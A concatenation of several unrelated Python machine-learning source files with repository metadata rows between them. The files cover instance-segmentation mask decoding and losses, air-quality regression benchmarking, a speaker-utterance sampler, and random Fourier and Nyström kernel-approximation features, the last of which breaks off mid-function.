            boxes_per_image[:, 0::2] = boxes_per_image[:, 0::2] * img_shape[1]
            boxes_per_image[:, 1::2] = boxes_per_image[:, 1::2] * img_shape[0]
        if rescale:
            boxes_per_image /= boxes_per_image.new_tensor(scale_factor)
        if pred_mask_logits is None:  # hard inf
            seg_masks = self.decode_mask(
                pred_mask_token, boxes_per_image, ori_shape, soft_inf=False)
        else:  # soft inf
            seg_masks = self.decode_mask(
                pred_mask_logits, boxes_per_image, ori_shape, soft_inf=True)
        return torch.cat((boxes_per_image, pred_score[:num_objects].unsqueeze(-1)), dim=-1), pred_class_token, seg_masks
    def decode_mask(self, mask_token, bboxes, ori_shape, soft_inf=False):
        """Decode VQ-VAE mask tokens (or logits) and paste them into
        full-image boolean masks.

        Args:
            mask_token: Hard token ids of shape (N, L), or, when
                ``soft_inf`` is True, logits of shape (N, L, C) that are
                reshaped to (N, C, sqrt(L), sqrt(L)) for soft decoding.
            bboxes: (N, 4) boxes the decoded masks are pasted into.
            ori_shape: Target image shape (h, w, ...).
            soft_inf: Use ``decode_soft`` on logits instead of hard decoding.

        Returns:
            Boolean tensor of shape (N, img_h, img_w).
        """
        img_h, img_w = ori_shape[:2]
        device = mask_token.device
        # N, 1, H, W
        if soft_inf:
            _N, _L, _C = mask_token.shape
            mask_token = mask_token.transpose(1, 2).reshape(
                _N, _C, int(sqrt(_L)), int(sqrt(_L)))
            mask_pred = self.vqvae.decode_soft(
                mask_token).unsqueeze(1)  # mask_token is mask_logits
        else:
            mask_pred = self.vqvae.decode(mask_token).unsqueeze(1)
        N = len(mask_pred)
        # The actual implementation split the input into chunks,
        # and paste them chunk by chunk.
        if device.type == 'cpu':
            # CPU is most efficient when they are pasted one by one with
            # skip_empty=True, so that it performs minimal number of
            # operations.
            num_chunks = N
        else:
            # GPU benefits from parallelism for larger chunks,
            # but may have memory issue
            # the types of img_w and img_h are np.int32,
            # when the image resolution is large,
            # the calculation of num_chunks will overflow.
            # so we need to change the types of img_w and img_h to int.
            # See https://github.com/open-mmlab/mmdetection/pull/5191
            # BYTES_PER_FLOAT / GPU_MEM_LIMIT are module-level constants.
            num_chunks = int(
                np.ceil(N * int(img_h) * int(img_w) * BYTES_PER_FLOAT /
                        GPU_MEM_LIMIT))
            assert (num_chunks <=
                    N), 'Default GPU_MEM_LIMIT is too small; try increasing it'
        chunks = torch.chunk(torch.arange(N, device=device), num_chunks)

        im_mask = torch.zeros(
            N,
            img_h,
            img_w,
            device=device,
            dtype=torch.bool)
        for inds in chunks:
            masks_chunk, spatial_inds = _do_paste_mask(
                mask_pred[inds],
                bboxes[inds],
                img_h,
                img_w,
                skip_empty=device.type == 'cpu')

            # must use >0 because of grid_sample padding 0.
            # version change to >= 0.5 and add denorm before
            masks_chunk = (masks_chunk >= 0.5).to(dtype=torch.bool)

            im_mask[(inds, ) + spatial_inds] = masks_chunk
        return im_mask
def simple_test(self, feats, img_metas, rescale=False):
# forward of this head requires img_metas
outs = self.forward(feats, img_metas)
results_list = self.get_bboxes(*outs, img_metas, rescale=rescale)
return results_list
def dice_loss(inputs, targets):
    """
    Compute the DICE loss, similar to generalized IOU for masks
    Args:
        inputs: A float tensor of arbitrary shape.
                The predictions for each example.
        targets: A float tensor with the same shape as inputs. Stores the binary
                 classification label for each element in inputs
                (0 for the negative class and 1 for the positive class).
    """
    # Predictions are clamped to [0, 1] instead of passed through a sigmoid.
    pred = inputs.clip(min=0., max=1.).flatten(1)
    gt = targets.flatten(1)
    # +1 smoothing in numerator/denominator keeps empty masks well-defined.
    intersection = (pred * gt).sum(-1)
    total = pred.sum(-1) + gt.sum(-1)
    per_sample = 1 - (2 * intersection + 1) / (total + 1)
    return per_sample.mean()
def sigmoid_focal_loss(inputs, targets, alpha: float = 0.25, gamma: float = 2):
    """
    Loss used in RetinaNet for dense detection: https://arxiv.org/abs/1708.02002.
    Args:
        inputs: A float tensor of arbitrary shape.
                The predictions for each example.
        targets: A float tensor with the same shape as inputs. Stores the binary
                 classification label for each element in inputs
                (0 for the negative class and 1 for the positive class).
        alpha: (optional) Weighting factor in range (0,1) to balance
                positive vs negative examples. Default = -1 (no weighting).
        gamma: Exponent of the modulating factor (1 - p_t) to
               balance easy vs hard examples.
    Returns:
        Loss tensor
    """
    p = inputs.sigmoid()
    raw_ce = F.binary_cross_entropy_with_logits(
        inputs, targets, reduction="none")
    # p_t: probability assigned to the true class of each element.
    pt = p * targets + (1 - p) * (1 - targets)
    modulated = raw_ce * ((1 - pt) ** gamma)
    if alpha < 0:
        # Negative alpha disables class balancing.
        return modulated.mean()
    weight = alpha * targets + (1 - alpha) * (1 - targets)
    return (weight * modulated).mean()
def crop_and_resize_gpu(bitmapmasks,
                        bboxes,
                        out_shape,
                        inds,
                        device='cpu',
                        interpolation='bilinear',
                        binarize=True):
    """See :func:`BaseInstanceMasks.crop_and_resize`.

    Crop each selected instance mask to its bounding box and resample it to
    ``out_shape`` via ``roi_align``, running entirely on ``device``.

    Args:
        bitmapmasks: BitmapMasks-like object exposing a ``.masks`` ndarray.
        bboxes: (N, 4) boxes, tensor or ndarray, one per output mask.
        out_shape: Output size of the cropped masks.
        inds: Index into ``bitmapmasks.masks`` for each box (e.g. the random
            permutation applied to the GT objects).
        device: Device to run the crop/resize on.
        interpolation: Unused — roi_align is always called with 'avg'
            pooling here; presumably kept for API parity. TODO confirm.
        binarize: If True, threshold the resampled soft masks at 0.5.

    Returns:
        Tensor of shape (N, *out_shape) with the dtype of ``bboxes``.
    """
    if len(bitmapmasks.masks) == 0:
        return torch.empty((0, *out_shape), dtype=bboxes.dtype, device=device)
    # convert bboxes to tensor
    if isinstance(bboxes, np.ndarray):
        bboxes = torch.from_numpy(bboxes).to(device=device)
    if isinstance(inds, np.ndarray):
        inds = torch.from_numpy(inds).to(device=device)
    num_bbox = bboxes.shape[0]
    # roi_align expects rois as (batch_index, x1, y1, x2, y2); each mask acts
    # as its own "image", hence the 0..N-1 fake batch indices.
    fake_inds = torch.arange(
        num_bbox, device=device).to(dtype=bboxes.dtype)[:, None]
    rois = torch.cat([fake_inds, bboxes], dim=1)  # Nx5
    rois = rois.to(device=device)
    if num_bbox > 0:
        gt_masks_th = torch.from_numpy(bitmapmasks.masks).to(device).index_select(
            0, inds).to(dtype=rois.dtype)
        targets = roi_align(gt_masks_th[:, None, :, :], rois, out_shape,
                            1.0, 0, 'avg', True).squeeze(1)
        if binarize:
            resized_masks = (targets >= 0.5)
        else:
            resized_masks = targets
    else:
        resized_masks = torch.empty(
            (0, *out_shape), dtype=bboxes.dtype, device=device)
    return resized_masks.to(dtype=bboxes.dtype)
def _do_paste_mask(masks, boxes, img_h, img_w, skip_empty=True):
    """Paste instance masks according to boxes.

    This implementation is modified from
    https://github.com/facebookresearch/detectron2/

    Args:
        masks (Tensor): N, 1, H, W
        boxes (Tensor): N, 4
        img_h (int): Height of the image to be pasted.
        img_w (int): Width of the image to be pasted.
        skip_empty (bool): Only paste masks within the region that
            tightly bound all boxes, and returns the results this region only.
            An important optimization for CPU.

    Returns:
        tuple: (Tensor, tuple). The first item is mask tensor, the second one
            is the slice object.
        If skip_empty == False, the whole image will be pasted. It will
            return a mask of shape (N, img_h, img_w) and an empty tuple.
        If skip_empty == True, only area around the mask will be pasted.
            A mask of shape (N, h', w') and its start and end coordinates
            in the original image will be returned.
    """
    # On GPU, paste all masks together (up to chunk size)
    # by using the entire image to sample the masks
    # Compared to pasting them one by one,
    # this has more operations but is faster on COCO-scale dataset.
    device = masks.device
    if skip_empty:
        # Tight integer bounds around all boxes, with a 1-pixel margin,
        # clamped to the image.
        x0_int, y0_int = torch.clamp(
            boxes.min(dim=0).values.floor()[:2] - 1,
            min=0).to(dtype=torch.int32)
        x1_int = torch.clamp(
            boxes[:, 2].max().ceil() + 1, max=img_w).to(dtype=torch.int32)
        y1_int = torch.clamp(
            boxes[:, 3].max().ceil() + 1, max=img_h).to(dtype=torch.int32)
    else:
        x0_int, y0_int = 0, 0
        x1_int, y1_int = img_w, img_h
    x0, y0, x1, y1 = torch.split(boxes, 1, dim=1)  # each is Nx1

    N = masks.shape[0]

    # Pixel-center coordinates of the paste region, mapped into each box's
    # normalized [-1, 1] frame as expected by F.grid_sample.
    img_y = torch.arange(y0_int, y1_int, device=device).to(torch.float32) + 0.5
    img_x = torch.arange(x0_int, x1_int, device=device).to(torch.float32) + 0.5
    img_y = (img_y - y0) / (y1 - y0) * 2 - 1
    img_x = (img_x - x0) / (x1 - x0) * 2 - 1
    # img_x, img_y have shapes (N, w), (N, h)
    # IsInf op is not supported with ONNX<=1.7.0
    if not torch.onnx.is_in_onnx_export():
        # Degenerate (zero-area) boxes produce inf coordinates; zero them out.
        if torch.isinf(img_x).any():
            inds = torch.where(torch.isinf(img_x))
            img_x[inds] = 0
        if torch.isinf(img_y).any():
            inds = torch.where(torch.isinf(img_y))
            img_y[inds] = 0

    gx = img_x[:, None, :].expand(N, img_y.size(1), img_x.size(1))
    gy = img_y[:, :, None].expand(N, img_y.size(1), img_x.size(1))
    grid = torch.stack([gx, gy], dim=3)

    img_masks = F.grid_sample(
        masks.to(dtype=torch.float32), grid, align_corners=False)

    if skip_empty:
        return img_masks[:, 0], (slice(y0_int, y1_int), slice(x0_int, x1_int))
    else:
        return img_masks[:, 0], ()
| paperwave/AiT | ait/code/model/detection/insseg_head.py | insseg_head.py | py | 31,161 | python | en | code | null | github-code | 1 | [
{
"api_name": "mmcv.runner.BaseModule",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "model.build_model",
"line_number": 96,
"usage_type": "call"
},
{
"api_name": "torch.ones",
"line_number": 106,
"usage_type": "call"
},
{
"api_name": "torch.nn.CrossEn... |
20578247223 | import numpy as np
import pandas as pd
import statsmodels.api as sm
from pandas.tseries.offsets import MonthEnd
from prettytable import PrettyTable, MARKDOWN
from sklearn.kernel_ridge import KernelRidge
from sklearn.linear_model import LassoCV, RidgeCV
from sklearn.metrics import mean_squared_error
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from regression.regression_models import *
from utils.utils import Dataset, get_dataset
def get_regressors():
    """Return the display names of all evaluated models, in report order."""
    linear_family = [
        'Lineare',
        'Lineare robusto (Huber)',
        'Lineare avanzato (Cook)',
    ]
    regularized = ['Ridge', 'Lasso']
    polynomial = ['Polinomiale (grado 2)', 'Polinomiale (grado 3)']
    ensembles = ['Random Forest', 'Gradient Boosting']
    svr_family = [
        'SVR (Kernel lineare)',
        'SVR (Kernel polinomiale)',
        'SVR (Kernel RBF)',
    ]
    return (linear_family + regularized + polynomial + ensembles
            + svr_family + ['KernelRidge'])
def get_regressors_smaller():
    """Return the model names with abbreviated SVR labels (for wide tables)."""
    linear_family = [
        'Lineare',
        'Lineare robusto (Huber)',
        'Lineare avanzato (Cook)',
    ]
    regularized = ['Ridge', 'Lasso']
    polynomial = ['Polinomiale (grado 2)', 'Polinomiale (grado 3)']
    ensembles = ['Random Forest', 'Gradient Boosting']
    svr_family = ['SVR (lineare)', 'SVR (polinomiale)', 'SVR (RBF)']
    return (linear_family + regularized + polynomial + ensembles
            + svr_family + ['KernelRidge'])
def avg(scores):
    """Format the arithmetic mean of *scores* with two decimal places."""
    mean_value = sum(scores) / len(scores)
    return f'{mean_value:0.2f}'
def make_avg(predictor, X, y, n=500):
    """Average R² and RMSE of *predictor* over *n* random 70/30 splits.

    Returns:
        Tuple of two strings: (mean R², mean RMSE), formatted by avg().
    """
    r2_runs = []
    rmse_runs = []
    for _ in range(n):
        X_train, X_test, y_train, y_test = train_test_split(
            X, y, test_size=0.3, shuffle=True)
        predictor.fit(X_train, y_train)
        r2_runs.append(predictor.score(X_test, y_test))
        prediction = predictor.predict(X_test)
        rmse_runs.append(mean_squared_error(y_test, prediction, squared=False))
    return avg(r2_runs), avg(rmse_runs)
def apply_linear_regression(X, y):
    """Averaged R²/RMSE for a plain linear model."""
    model = get_linear_model()
    return make_avg(model, X, y)
def apply_cook_regression(X, y):
    """Averaged R²/RMSE for a linear model after dropping influential points.

    Observations whose Cook's distance exceeds the usual 4/n threshold
    are removed before fitting.
    """
    ols_fit = sm.OLS(y, sm.add_constant(X)).fit()
    influence = ols_fit.get_influence()
    threshold = 4 / len(X)
    distances, _p_values = influence.cooks_distance
    keep = distances < threshold
    return make_avg(get_linear_model(), X[keep], y[keep])
def apply_huber_regression(X, y):
    """Averaged R²/RMSE for a Huber (robust) linear model."""
    model = get_huber_model()
    return make_avg(model, X, y)
def apply_lasso_regression(X, y):
    """Averaged R²/RMSE for a cross-validated Lasso pipeline."""
    lasso_cv = LassoCV(n_alphas=100, random_state=1)
    pipeline = make_pipeline(StandardScaler(with_mean=False), lasso_cv)
    return make_avg(pipeline, X, y)
def apply_ridge_regression(X, y):
    """Averaged R²/RMSE for a cross-validated Ridge pipeline."""
    candidate_alphas = 10. ** np.arange(-2, 5)
    ridge_cv = RidgeCV(alphas=candidate_alphas,
                       scoring='neg_mean_squared_error')
    pipeline = make_pipeline(StandardScaler(with_mean=False), ridge_cv)
    return make_avg(pipeline, X, y)
def apply_poly_regression(X, y):
    """Averaged R²/RMSE for the default (degree-2) polynomial model."""
    model = get_polynomial_model()
    return make_avg(model, X, y)
def apply_poly_3_regression(X, y):
    """Averaged R²/RMSE for a degree-3 polynomial linear regression."""
    pipeline = make_pipeline(
        PolynomialFeatures(degree=3, include_bias=False),
        linear_model.LinearRegression(n_jobs=-1))
    return make_avg(pipeline, X, y)
def apply_kridge_regression(X, y):
    """Averaged R²/RMSE for a degree-2 polynomial KernelRidge pipeline."""
    kernel_ridge = KernelRidge(alpha=1, kernel='poly', degree=2,
                               gamma=1, coef0=1)
    pipeline = make_pipeline(StandardScaler(with_mean=False), kernel_ridge)
    return make_avg(pipeline, X, y)
def apply_random_forest_regression(X, y):
    """Averaged R²/RMSE for a random forest model."""
    model = get_random_forest_model()
    return make_avg(model, X, y)
def apply_gradient_boosting_regression(X, y):
    """Averaged R²/RMSE for a gradient boosting model."""
    model = get_gradient_boosting_model()
    return make_avg(model, X, y)
def apply_svr_linear_regression(X, y):
    """Averaged R²/RMSE for an SVR with a linear kernel."""
    model = get_svr_linear_model()
    return make_avg(model, X, y)
def apply_svr_polynomial_regression(X, y):
    """Averaged R²/RMSE for an SVR with a polynomial kernel."""
    model = get_svr_polynomial_model()
    return make_avg(model, X, y)
def apply_rbf_polynomial_regression(X, y):
    """Averaged R²/RMSE for an SVR with an RBF kernel."""
    model = get_svr_rbf_model()
    return make_avg(model, X, y)
def evaluate(X, y):
    """Run every regression model on (X, y) and collect averaged scores.

    Returns:
        Tuple (r2_scores, rmse_scores): two lists of formatted strings,
        ordered like get_regressors().
    """
    # Each call returns an (R², RMSE) pair of formatted strings.
    lr = apply_linear_regression(X, y)
    huber = apply_huber_regression(X, y)
    cook = apply_cook_regression(X, y)
    ridge = apply_ridge_regression(X, y)
    lasso = apply_lasso_regression(X, y)
    kridge = apply_kridge_regression(X, y)
    poly2 = apply_poly_regression(X, y)
    poly3 = apply_poly_3_regression(X, y)
    forest = apply_random_forest_regression(X, y)
    boosting = apply_gradient_boosting_regression(X, y)
    svr_lin = apply_svr_linear_regression(X, y)
    svr_poly = apply_svr_polynomial_regression(X, y)
    svr_rbf = apply_rbf_polynomial_regression(X, y)
    # Assemble in the order expected by get_regressors() (KernelRidge last).
    ordered = [lr, huber, cook, ridge, lasso, poly2, poly3, forest,
               boosting, svr_lin, svr_poly, svr_rbf, kridge]
    r2_scores = [r2 for r2, _ in ordered]
    rmse_scores = [rmse for _, rmse in ordered]
    return r2_scores, rmse_scores
def print_annual_results(results, title):
    """Print a markdown table of full-year R² and RMSE per model.

    ``title`` is currently unused (the table title line is commented out).
    """
    table = PrettyTable()
    # table.title = title
    table.add_column('Modello di regressione', get_regressors())
    table.add_column('R²', results[0])
    table.add_column('RMSE (µg/m³)', results[1])
    table.align = 'l'
    table.set_style(MARKDOWN)
    print(table)
def print_monthly_results(month_results, title):
    """Print two markdown tables (R² first, then RMSE), one column per month.

    ``title`` is currently unused (the table title line was commented out).
    """
    def build_table(metric_idx):
        """Build a table for metric_idx (0 -> R², 1 -> RMSE)."""
        table = PrettyTable()
        # table.title = '{} | '.format('R²' if metric_idx == 0 else 'RMSE (µg/m³)') + title
        table.add_column('Modello', get_regressors_smaller())
        for month in month_results:
            scores = month['results'][metric_idx]
            # Months without enough data carry all-zero columns; skip them.
            if any(scores):
                table.add_column(month['period'], scores)
        table.align = 'l'
        return table

    for metric_idx in (0, 1):  # R², then RMSE
        table = build_table(metric_idx)
        table.set_style(MARKDOWN)
        print(table)
def annual_summary(dataset, station, chemical):
    """Evaluate all models on the full dataset and print the annual table."""
    airqino = dataset['airqino_{}'.format(chemical)].values.reshape((-1, 1))
    arpat = dataset['arpat_{}'.format(chemical)].values
    scores = evaluate(airqino, arpat)
    title = 'All year | {n} | {c} (n={l})'.format(
        c=chemical.upper(), n=station, l=str(len(dataset)))
    print_annual_results(scores, title=title)
def monthly_summary(dataset, station, chemical, is_24h=False):
    """Evaluate all models month by month and print the monthly tables.

    Months with fewer rows than the minimum are kept as all-zero
    placeholder entries so the printing step can skip their columns.
    """
    # NO2 data covers calendar 2020; PM data covers Sep 2020 - Aug 2021.
    if chemical == 'no2':
        months = pd.date_range('2020-01-01', '2020-12-31', freq='MS')
    else:
        months = pd.date_range('2020-09-01', '2021-08-31', freq='MS')
    # Fewer samples per month are expected on daily-aggregated data.
    min_rows = 5 if is_24h else 70
    month_results = []
    for month_start in months:
        label = month_start.strftime('%b')
        first_day = month_start.strftime('%Y-%m-%d')
        last_day = (month_start + MonthEnd(1)).strftime('%Y-%m-%d')
        month_data = dataset.loc[first_day: last_day]
        if month_data.empty or len(month_data.index) < min_rows:
            # Not enough data: record zero-filled placeholder columns.
            placeholder = [[0 for _ in get_regressors()],
                           [0 for _ in get_regressors()]]
            month_results.append({
                'results': placeholder,
                'period': label,
                'values_count': str(len(month_data.index)),
            })
            continue
        airqino = month_data['airqino_{}'.format(chemical)].values.reshape((-1, 1))
        arpat = month_data['arpat_{}'.format(chemical)].values
        month_results.append({
            'results': evaluate(airqino, arpat),
            'period': label,
            'values_count': str(len(arpat)),
        })
    print_monthly_results(
        month_results,
        title='Monthly results | {d} | {c}'.format(c=chemical.upper(), d=station))
if __name__ == '__main__':
    # Each commented block reproduces one experiment; uncomment the lines
    # for the station/chemical combination you want to run.

    # SMART16 - NO2
    # dataset = get_dataset(Dataset.SMART16_NO2).loc['2020-01-18': '2020-12-31']
    # annual_summary(dataset=dataset, station='SMART16-CAPANNORI', chemical='no2')
    # monthly_summary(dataset=dataset, station='SMART16-CAPANNORI', chemical='no2')

    # SMART16_new - PM2.5
    # annual_summary(dataset=get_dataset(Dataset.SMART16_NEW_PM), station='SMART16_new-CAPANNORI', chemical='pm2.5')
    # monthly_summary(dataset=get_dataset(Dataset.SMART16_NEW_PM), station='SMART16_new-CAPANNORI', chemical='pm2.5')

    # SMART16_new - PM10
    # annual_summary(dataset=get_dataset(Dataset.SMART16_NEW_PM), station='SMART16_new-CAPANNORI', chemical='pm10')
    # monthly_summary(dataset=get_dataset(Dataset.SMART16_NEW_PM), station='SMART16_new-CAPANNORI', chemical='pm10')

    # SMART16_new - PM2.5 - 8H
    # annual_summary(get_dataset(Dataset.SMART16_NEW_PM_12H), 'SMART16_new-CAPANNORI-8h', 'pm2.5')
    # monthly_summary(get_dataset(Dataset.SMART16_NEW_PM_12H), 'SMART16_new-CAPANNORI-12h', 'pm2.5', is_24h=True)

    # SMART16_new - PM10 - 8H
    # annual_summary(get_dataset(Dataset.SMART16_NEW_PM_12H), 'SMART16_new-CAPANNORI-8h', 'pm10')
    # Active experiment: monthly PM10 tables on the aggregated dataset.
    # NOTE(review): the station label says '8h' while the dataset constant is
    # SMART16_NEW_PM_12H — confirm which aggregation window is intended.
    monthly_summary(get_dataset(Dataset.SMART16_NEW_PM_12H), 'SMART16_new-CAPANNORI-8h', 'pm10', is_24h=True)
| n3d1117/airqino-calibration | regression/regression_summary.py | regression_summary.py | py | 8,833 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "sklearn.model_selection.train_test_split",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.mean_squared_error",
"line_number": 62,
"usage_type": "call"
},
{
"api_name": "statsmodels.api.OLS",
"line_number": 71,
"usage_type": "call"... |
70352039714 | from data_objects.random_cycler import RandomCycler
from data_objects.utterance import Utterance
from pathlib import Path
"""Minimally altered code from https://github.com/Trebolium/Real-Time-Voice-Cloning/tree/master/encoder/data_objects"""
# Contains the set of utterances of a single speaker
class Speaker:
    """A single speaker's set of utterances, discovered lazily from *.npy files."""

    def __init__(self, root: Path):
        self.root = root
        self.name = root.name
        # Both are populated on the first random_partial() call.
        self.utterances = None
        self.utterance_cycler = None

    def _load_utterances(self, num_feats):
        """Discover this speaker's feature files and wrap them as Utterances.

        Utterance stores mel and wav paths only; arrays are not turned into
        npy objects until random_partial() is called on them.
        """
        discovered = []
        for feature_file in self.root.glob('*.npy'):
            stem = feature_file.name[:-4]  # strip the '.npy' suffix
            discovered.append(
                Utterance(self.root.joinpath(stem + '.npy'), stem + '.wav'))
        self.utterances = discovered
        self.utterance_cycler = RandomCycler(self.utterances)

    def random_partial(self, count, n_frames, num_feats):
        """
        Samples a batch of <count> unique partial utterances from the disk in a way that all
        utterances come up at least once every two cycles and in a random order every time.

        :param count: The number of partial utterances to sample from the set of utterances from
        that speaker. Utterances are guaranteed not to be repeated if <count> is not larger than
        the number of utterances available.
        :param n_frames: The number of frames in the partial utterance.
        :return: A list of tuples (utterance, frames, range) where utterance is an Utterance,
        frames are the frames of the partial utterances and range is the range of the partial
        utterance with regard to the complete utterance.
        """
        if self.utterances is None:
            self._load_utterances(num_feats)
        sampled = self.utterance_cycler.sample(count)
        # Each entry: (utterance, spliced feature array, (start, end) coords).
        return [(u,) + u.random_partial(n_frames, num_feats) for u in sampled]
| Trebolium/singer_id_encoder | data_objects/speaker.py | speaker.py | py | 2,155 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pathlib.Path",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "data_objects.utterance.Utterance",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "data_objects.random_cycler.RandomCycler",
"line_number": 20,
"usage_type": "call"
}
] |
27510683969 | """
Author: alberto.suarez@uam.es
Coauthors: joseantonio.alvarezo@estudiante.uam.es
franciscojavier.saez@estudiante.uam.es
"""
import warnings
from abc import ABC, abstractmethod
from typing import Callable, Optional, Union, Type
from sklearn.gaussian_process.kernels import RBF
import matplotlib.pyplot as plt
import numpy as np
import scipy as sp
# needed for default implementation of set_params
from sklearn.base import BaseEstimator, TransformerMixin
class RandomFeaturesSampler(ABC, BaseEstimator, TransformerMixin):
    """Base class for random feature samplers.

    Subclasses draw the projection vectors ``w``; this base class maps data
    through them into interleaved cos/sin random features.
    """

    def __init__(self, n_random_features: int) -> None:
        self.n_random_features = n_random_features
        self.w = None

    def _initialize_w(self, n_features: int) -> np.ndarray:
        pass

    @abstractmethod
    def fit(self, X: np.ndarray) -> np.ndarray:
        """Initialize w's for the random features.

        This should be implemented for each kernel.
        """
        pass

    def fit_transform(
        self, X: np.ndarray, X_prime: Optional[np.ndarray] = None
    ) -> np.ndarray:
        """Initialize w's (fit) & compute random features (transform)."""
        self.fit(np.shape(X)[1])
        return self.transform(X)

    def transform(self, X: np.ndarray) -> np.ndarray:
        """Compute the random features.

        Assumes that the vector of w's has been initialized.

        Parameters
        ----------
        X:
            Data matrix of shape (n_instances, n_features).

        Returns
        -------
        random_features:
            Array of shape (n_instances, n_random_features).
        """
        if self.w is None:
            raise ValueError("Use fit_transform to initialize w.")
        n_instances, n_features = np.shape(X)
        if np.shape(self.w)[1] != n_features:
            raise ValueError("Different # of features for X and w.")
        # Even columns hold cosines, odd columns sines of the projections.
        projections = X @ self.w.T
        features = np.empty((n_instances, self.n_random_features))
        features[:, ::2] = np.cos(projections)
        features[:, 1::2] = np.sin(projections)
        return features / np.sqrt(self.n_random_features // 2)
class RandomFeaturesSamplerRBF(RandomFeaturesSampler):
    """Random Fourier Features for the RBF kernel."""

    def __init__(self, sigma: float = 1.0, n_random_features: int = 100) -> None:
        self.sigma = sigma
        # The parent class stores the number of random features.
        super().__init__(n_random_features)

    def fit(self, n_features: int = 100) -> np.ndarray:
        """Draw w's from N(0, sigma^2 I), the RBF spectral distribution."""
        rng = np.random.default_rng()
        self.w = rng.multivariate_normal(
            np.zeros(n_features),
            self.sigma ** 2 * np.identity(n_features),
            self.n_random_features // 2,
        )
class RandomFeaturesSamplerMatern(RandomFeaturesSampler):
    """Random Fourier Features for the Matern kernel.

    The Fourier transform of the Matérn kernel is a Student's t
    distribution with twice the degrees of freedom.  Ref. Chapter 4 of
    Carl Edward Rasmussen and Christopher K. I. Williams. 2005.
    Gaussian Processes for Machine Learning
    (Adaptive Computation and Machine Learning). The MIT Press.
    There is probably a mistake with the scale factor.
    """

    def __init__(
        self, scale: float = 1.0, nu: float = 1.0, n_random_features: int = 100
    ) -> None:
        # Attribute names mirror constructor arguments so sklearn's
        # get_params/set_params (e.g. GridSearch) keep working; the original
        # ``2.0 * nu`` transformation had to be dropped for that reason.
        self.nu = nu
        self.scale = scale
        super().__init__(n_random_features)
        self.w = None

    def fit(self, n_features: int) -> np.ndarray:
        """Draw w's from the multivariate Student's t spectral distribution."""
        # Scale of the Fourier transform of the kernel.
        self.w = random_multivariate_student_t(
            np.zeros(n_features),
            self.scale ** 2 * np.identity(n_features),
            self.nu,
            self.n_random_features // 2,
        )
def random_multivariate_student_t(
    mean: np.ndarray,
    cov_matrix: np.ndarray,
    degrees_of_freedom: float,
    n_samples: int,
) -> np.ndarray:
    """Generate samples from a multivariate Student's t distribution.

    A Student's t sample is a Gaussian sample divided by the square root of
    an independent scaled chi-square variable; see
    https://en.wikipedia.org/wiki/Multivariate_t-distribution#Definition
    """
    dim = len(mean)
    rng = np.random.default_rng()
    # One scaled chi-square denominator per sample.
    u = rng.chisquare(degrees_of_freedom, n_samples) / degrees_of_freedom
    gaussians = rng.multivariate_normal(np.zeros(dim), cov_matrix, n_samples)
    return mean + gaussians / np.sqrt(u)[:, np.newaxis]
class NystroemFeaturesSampler(BaseEstimator, TransformerMixin):
    """Sample Nystroem features.

    Approximates the feature map of ``kernel`` by projecting onto a random
    subset J of the training instances: phi(x) = K(x, J) @ (K(J, J)^+)^(1/2).
    """

    def __init__(
        self,
        kernel: Callable[[np.ndarray, np.ndarray], np.ndarray] = RBF(),
        n_random_features: int = 100,
    ) -> None:
        # _kernel -> kernel due to SKlearn compatibility
        # NOTE(review): the default RBF() is instantiated once at class
        # definition time and shared by all instances — confirm kernels are
        # treated as stateless here.
        self.kernel = kernel
        self.component_indices_ = None
        # J
        self._X_reduced = None
        # W
        self._reduced_kernel_matrix = None
        # (W+)^1/2
        self._sqrtm_pinv_reduced_kernel_matrix = None
        # Needed for compatibility
        self.n_random_features = n_random_features

    def fit(
        self, X: np.ndarray, y: Optional[np.ndarray] = None  # Compatibility
    ) -> np.ndarray:
        """Precompute auxiliary quantities for Nystroem features."""
        n_instances = len(X)
        # Check dimensions to avoid selecting more features than
        # possible
        n_random_features = self.n_random_features
        if self.n_random_features > n_instances:
            n_random_features = n_instances
        # Sample subset of training instances.
        rng = np.random.default_rng()
        self.component_indices_ = rng.choice(
            range(n_instances),
            size=n_random_features,
            replace=False,
        )
        self._X_reduced = X[self.component_indices_, :]
        # Compute reduced kernel matrix.
        self._reduced_kernel_matrix = self.kernel(self._X_reduced, self._X_reduced)
        self._reduced_kernel_matrix = (
            self._reduced_kernel_matrix + self._reduced_kernel_matrix.T
        ) / 2.0  # enforce symmetry of kernel matrix
        # Compute auxiliary quantities: (W+)^(1/2) via pseudo-inverse so that
        # (near-)singular reduced kernel matrices are handled.
        self._sqrtm_pinv_reduced_kernel_matrix = sp.linalg.sqrtm(
            np.linalg.pinv(self._reduced_kernel_matrix, rcond=1.0e-6, hermitian=True)
        )
        # Check that complex part is negligible and eliminate it
        if np.iscomplexobj(self._sqrtm_pinv_reduced_kernel_matrix):
            threshold_imaginary_part = 1.0e-6
            max_imaginary_part = np.max(
                np.abs(np.imag(self._sqrtm_pinv_reduced_kernel_matrix))
            )
            # if max_imaginary_part > threshold_imaginary_part:
            #     warnings.warn("Maximum imaginary part is {}".format(max_imaginary_part))
            self._sqrtm_pinv_reduced_kernel_matrix = np.real(
                self._sqrtm_pinv_reduced_kernel_matrix
            )

    def approximate_kernel_matrix(
        self,
        X: np.ndarray,
        # Needed for sklearn compatibility
        X_prime: Optional[np.ndarray] = None,
    ) -> np.ndarray:
        """Approximate the kernel matrix using Nystroem features."""
        X_features = self.fit_transform(X)
        return X_features @ X_features.T

    def fit_transform(
        self,
        X: np.ndarray,
        X_prime: Optional[np.ndarray] = None,
    ) -> np.ndarray:
        """Compute Nyström features."""
        self.fit(X)
        return self.transform(X)

    def transform(self, X_prime: np.ndarray) -> np.ndarray:
        """Compute Nystroem features with precomputed quantities."""
        # K(X', J) @ (K(J, J)^+)^(1/2)
        J = self.kernel(X_prime, self._X_reduced)
        return J @ self._sqrtm_pinv_reduced_kernel_matrix
def demo_kernel_approximation_features(
    X: np.ndarray,
    kernel: Callable[[np.ndarray, np.ndarray], np.ndarray],
    features_sampler_class: Union[
        Type[RandomFeaturesSampler], Type[NystroemFeaturesSampler]
    ],
    features_sampler_kwargs: np.ndarray,
    n_features: np.array,
) -> None:
    """Kernel approximation using random sampled features.

    Either RFF or Nyström features.  Plots the exact kernel matrix next to
    one approximation per entry of ``n_features``, annotated with the mean
    and max absolute error.
    """
    fig, axes = plt.subplots(1, len(n_features) + 1)
